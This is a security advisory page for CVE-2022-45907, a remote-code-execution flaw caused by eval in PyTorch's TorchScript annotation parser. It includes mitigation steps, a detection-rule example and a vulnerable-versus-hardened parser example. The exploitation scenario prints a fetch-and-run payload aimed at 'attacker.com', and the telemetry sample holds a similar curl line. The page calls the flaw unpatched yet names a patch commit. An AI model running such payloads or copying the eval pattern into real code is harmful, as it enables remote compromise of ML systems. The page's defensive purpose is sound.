CVE-2022-45907: PyTorch: RCE via unsafe eval in JIT annotations

Severity: CRITICAL. PoC available.
Published November 26, 2022
CISO Take

Any PyTorch deployment processing untrusted model files or scripts is exposed to unauthenticated remote code execution — this includes model serving APIs, MLOps pipelines, and shared training infrastructure. Patch immediately to commit 767f6aa or later. Treat all PyTorch processes handling external model inputs as a high-privilege attack surface until patched.

What is the risk?

Critical. CVSS 9.8 with network-accessible, zero-auth, zero-interaction exploitation. PyTorch is the dominant ML framework across both research and production, making the blast radius enormous. Exploitation is trivial — crafting a malicious type annotation string requires no specialized ML knowledge. Unpatched model serving endpoints or collaborative ML platforms (Jupyter, MLflow, Weights & Biases integrations) represent the highest-risk exposure.

What systems are affected?

Package: PyTorch
Ecosystem: pip
Vulnerable range: (not listed)
Patched: No patch

Do you use PyTorch? You're affected.

How severe is it?

CVSS 3.1: 9.8 / 10
EPSS: 1.2% chance of exploitation in 30 days (higher than 64% of all CVEs)
Exploitation status: Exploit Available
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation confidence: medium (public PoC indexed in trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV (Attack Vector): Network
AC (Attack Complexity): Low
PR (Privileges Required): None
UI (User Interaction): None
S (Scope): Unchanged
C (Confidentiality): High
I (Integrity): High
A (Availability): High

What should I do?

5 steps
  1. Patch: apply commit 767f6aa49fe20a2766b9843d01e3b7f7793df6a3 or upgrade to a version past PyTorch trunk/89695.

  2. Workaround: block processing of untrusted PyTorch model files until patched; enforce allowlisting of model sources in MLOps pipelines.

  3. Isolate: run model loading and inference in sandboxed containers with minimal permissions and no network egress.

  4. Detect: alert on unexpected subprocess creation, outbound connections, or file writes originating from PyTorch inference/training processes.

  5. Audit: inventory all systems loading external .pt/.pth files or TorchScript definitions — prioritize public-facing model APIs.
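As an added example (not part of this advisory or of PyTorch), a minimal detection rule for step 4 run over constructed telemetry records: it flags a PyTorch workload that spawns a shell or downloader, connects to a destination outside an egress allowlist, or writes outside its expected paths, while leaving spawned python children alone because DataLoader workers look exactly like that. The event shape, the ML_MARKERS heuristic, and both allowlists are assumptions for a hypothetical deployment.

```python
import os
from typing import Dict, List, Optional

# Constructed endpoint telemetry (not real logs): one record per action taken by a
# process, in a generic shape that EDR or auditd events can be mapped onto.
ML_CMD = "python3 serve.py --model /models/resnet.pt"   # assumed inference service
EVENTS: List[Dict[str, str]] = [
    {"pid": "4101", "cmdline": ML_CMD, "event": "process_create", "target": "/usr/bin/curl http://203.0.113.7/shell.sh"},
    {"pid": "4101", "cmdline": ML_CMD, "event": "net_connect", "target": "203.0.113.7:443"},
    {"pid": "4101", "cmdline": ML_CMD, "event": "file_write", "target": "/tmp/shell.sh"},
    {"pid": "4101", "cmdline": ML_CMD, "event": "net_connect", "target": "10.0.5.20:5432"},
    {"pid": "4101", "cmdline": ML_CMD, "event": "process_create", "target": "/usr/bin/python3 -c from multiprocessing.spawn import spawn_main"},
    {"pid": "5207", "cmdline": "nginx: worker process", "event": "net_connect", "target": "203.0.113.7:443"},
]

# Assumed, site-specific tuning: how a PyTorch workload is recognised and what it is
# allowed to reach or write. Illustrative values, not a standard.
ML_MARKERS = ("serve.py", "train.py", ".pt", ".pth", "torch")
SHELLS_AND_DOWNLOADERS = {"sh", "bash", "dash", "zsh", "curl", "wget", "nc"}
EGRESS_ALLOW = {"10.0.5.20:5432", "10.0.5.21:9000"}   # feature store, object storage
WRITE_ALLOW = ("/models/cache/", "/var/log/inference/")

def is_ml_process(ev: Dict[str, str]) -> bool:
    return any(marker in ev["cmdline"] for marker in ML_MARKERS)

def evaluate(ev: Dict[str, str]) -> Optional[str]:
    """Return an alert reason for one event, or None if it looks expected."""
    if not is_ml_process(ev):
        return None
    if ev["event"] == "process_create":
        child = os.path.basename(ev["target"].split()[0])
        # python children are deliberately not flagged: DataLoader workers are
        # spawned python processes, so matching them would page on every training job.
        if child in SHELLS_AND_DOWNLOADERS:
            return f"PyTorch process spawned {child}: {ev['target']}"
    elif ev["event"] == "net_connect" and ev["target"] not in EGRESS_ALLOW:
        return f"unexpected egress to {ev['target']}"
    elif ev["event"] == "file_write" and not ev["target"].startswith(WRITE_ALLOW):
        return f"write outside allowed paths: {ev['target']}"
    return None

def alerts(events: List[Dict[str, str]]) -> List[str]:
    scored = ((ev, evaluate(ev)) for ev in events)
    return [f"pid {ev['pid']}: {reason}" for ev, reason in scored if reason]
```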

What does CISA's SSVC say?

Decision: Track
Exploitation: none
Automatable: No
Technical Impact: total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.8.1 - AI system development processes
NIST AI RMF
MANAGE 2.4 - Residual risks from AI system components are monitored and managed
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

Is CVE-2022-45907 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2022-45907, increasing the risk of exploitation.

What systems are affected by CVE-2022-45907?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, model registries, MLOps pipelines, inference APIs.

What is the CVSS score for CVE-2022-45907?

CVE-2022-45907 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 1.19%.

What is the AI security impact?

Affected AI Architectures

training pipelines, model serving, model registries, MLOps pipelines, inference APIs

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0011.000 Unsafe AI Artifacts
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.8.1
NIST AI RMF: MANAGE 2.4
OWASP LLM Top 10: LLM05

What are the technical details?

Original Advisory

In PyTorch before trunk/89695, torch.jit.annotations.parse_type_line can cause arbitrary code execution because eval is used unsafely.

Exploitation Scenario

An adversary publishes a malicious PyTorch model file to a public model hub (e.g., Hugging Face) or injects it into a shared model registry. The file contains a crafted TorchScript type annotation: parse_type_line receives a string like '__import__("os").system("curl attacker.com/shell.sh | bash")' as a type hint. When any downstream ML pipeline loads this model for inference or fine-tuning, PyTorch's JIT compiler processes the annotation via eval(), executing the payload with the service's OS-level privileges. No authentication, user interaction, or ML expertise is required — the exploit is effectively a supply chain attack against every consumer of the poisoned artifact.
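The unsafe pattern described above beside a hardened resolver, as an added example that is neither PyTorch's parse_type_line nor the upstream fix: a simplified `# type: (args) -> ret` comment parser (assumed names parse_type_line_vulnerable, parse_type_line_hardened, SAFE_TYPES) that hands the annotation text to eval(), versus one that validates the parsed AST against an allowlist of type-expression node kinds and known type names before resolving anything, so a call such as the one in the scenario is refused before it can run.

```python
import ast
import re
from typing import Any, Dict, List, Tuple

# Constructed, simplified model of a "# type: (args) -> ret" comment parser written
# to illustrate CVE-2022-45907; it is NOT PyTorch's own parse_type_line.
_TYPE_LINE = re.compile(r"^#\s*type:\s*(.*?)\s*->\s*(.*)$")

class Tensor: pass  # placeholder standing in for torch.Tensor
# Assumed allowlist of resolvable type names (a real resolver has a larger table).
SAFE_TYPES: Dict[str, Any] = {"Tensor": Tensor, "int": int, "float": float, "bool": bool, "List": List}
# AST node kinds a type expression legitimately needs; Call, Lambda, BinOp,
# comprehensions and everything else are rejected before anything is evaluated.
_ALLOWED_NODES = {"Expression", "Name", "Subscript", "Tuple", "List", "Constant", "Load", "Index"}

def _split(line: str) -> Tuple[str, str]:
    m = _TYPE_LINE.match(line.strip())
    if not m:
        raise ValueError(f"not a type comment: {line!r}")
    return m.group(1), m.group(2)

def parse_type_line_vulnerable(line: str, env: Dict[str, Any]):
    # The unsafe pattern: annotation text goes straight to eval(), so a crafted
    # comment runs arbitrary Python with the model loader's privileges.
    args, ret = _split(line)
    return eval(args, env), eval(ret, env)

def _safe_eval_type(expr: str, env: Dict[str, Any]) -> Any:
    tree = ast.parse(expr, mode="eval")
    for node in ast.walk(tree):
        kind = type(node).__name__
        if kind not in _ALLOWED_NODES:
            raise ValueError(f"disallowed {kind} in type annotation {expr!r}")
        if kind == "Name" and node.id not in env:
            raise ValueError(f"unknown type name {node.id!r}")
    # No builtins and only allowlisted names: nothing callable is reachable.
    return eval(compile(tree, "<type-comment>", "eval"), {"__builtins__": {}}, dict(env))

def parse_type_line_hardened(line: str, env: Dict[str, Any] = SAFE_TYPES):
    args, ret = _split(line)
    return _safe_eval_type(args, env), _safe_eval_type(ret, env)

def rejects(line: str) -> bool:
    # True if the hardened parser refuses the annotation before evaluating it.
    try:
        parse_type_line_hardened(line)
        return False
    except (ValueError, SyntaxError):
        return True
```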

Weaknesses (CWE)

CWE-94 — Improper Control of Generation of Code ('Code Injection'): The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

  • [Architecture and Design] Refactor your program so that you do not have to dynamically generate code.
  • [Architecture and Design] Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published: November 26, 2022
Last Modified: April 25, 2025
First Seen: November 26, 2022
